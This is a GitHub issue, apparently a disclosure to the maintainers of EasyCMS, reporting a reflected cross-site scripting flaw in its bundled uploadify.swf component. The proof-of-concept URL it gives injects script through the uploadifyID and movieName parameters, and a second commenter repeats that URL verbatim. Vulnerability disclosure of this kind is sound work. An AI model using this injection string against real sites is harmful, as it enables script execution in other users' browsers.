Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

there is a xss vuln in your product #7

Closed
xxy961216 opened this issue Sep 14, 2018 · 1 comment
Closed

there is a xss vuln in your product #7

xxy961216 opened this issue Sep 14, 2018 · 1 comment

Comments

@xxy961216
Copy link

xxy961216 commented Sep 14, 2018

Hi,teameasy!
When I use your cms,I found a xss vuln in your component.Untrusted flash version is the key of the problem,i hope you can fix it soon.
POC:
http://localhost/EasyCMS-master/App/Modules/Admin/Tpl/default/Public/dwz/uploadify/scripts/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}
thx
easy cms xss

@dahua966
Copy link

Hi,teameasy!
When I use your cms,I found a xss vuln in your component.Untrusted flash version is the key of the problem,i hope you can fix it soon.
POC:
[http://localhost/EasyCMS-master/App/Modules/Admin/Tpl/default/Public/dwz/uploadify/scripts/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}](http://localhost/EasyCMS-master/App/Modules/Admin/Tpl/default/Public/dwz/uploadify/scripts/uploadify.swf?uploadifyID=00%22%29%29;%7Dcatch%28e%29%7Balert%281%29;%7D//%28%22&movieName=%22%5D)%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(2)%7D%7D)
thx
easy cms xss

tql

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants